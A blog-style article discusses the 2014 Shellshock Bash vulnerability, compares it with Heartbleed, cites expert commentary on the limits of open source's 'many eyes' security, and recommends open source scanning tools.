Earlier this year, the discovery of the Heartbleed vulnerability caused a tremendous amount of discussion and worry around open source security. While some argued that this incident revealed that open source is not as reliable as originally thought, most experts believed that Heartbleed was essentially an anomaly, one that would drive companies and IT personnel to improve their security efforts.
However, now another open source vulnerability has appeared, one that is quite possibly even more dangerous than Heartbleed. This bug, known as Shellshock, is a serious flaw that could cause major problems. As was the case with Heartbleed, this discovery should serve as motivation for companies relying on open source to shore up their security efforts.
As Harvard Business Review contributor Karim Lakhani explained, Shellshock is a software flaw that exploits a vulnerability in Bash Shell. This allows hackers to potentially gain control over Linux and Unix computer systems, running whatever commands they so desire.
Shellshock has major implications for the Internet of Things, according to Lakhani. A huge number of machines are now connected to the Internet of Things and may be vulnerable to cybercriminals exploiting this flaw. This, the writer explained, makes Shellshock a much more significant threat to companies’ cybersecurity efforts than Heartbleed ever was. Heartbleed threatened personal information, while Shellshock threatens actual operations.
Fortunately, as Lakhani noted, affected organizations, including open source communities, have quickly initiated efforts to mitigate the damage and deliver solutions that can counter Shellshock. Some of these are already available.
However, this is only a short-term solution, and it does not address the greater issue. According to Lakhani, Shellshock will not be the last major vulnerability to appear, and firms need to take steps to prepare for more discoveries of this sort.
Infoworld contributor Roger Grimes seconded this notion. Grimes argued that this latest vulnerability should be seen as evidence that simply having more eyes viewing open source code does not automatically ensure its security. Put simply, he explained that while open source presents the opportunity for many people and organizations to view and evaluate a given piece of code’s security, the fact of the matter is that most will not take this step. And if that’s the case, then the potential inherent security advantages of open source will remain theoretical.
All of this does not mean that companies should abandon open source. Instead, businesses need to realize that it is dangerous to rely on others to verify the security of these solutions. This mindset has led many companies to embrace open source without taking the appropriate defensive measures, thereby putting their assets at risk.
Instead, organizations should invest in high-quality open source security tools that can protect these resources. Specifically, open source scanning tools can reveal precisely how open source is being used throughout the organization, This insight is key for ensuring that the company is following best practices with its open source adoption, limiting the risk of exposure or data loss.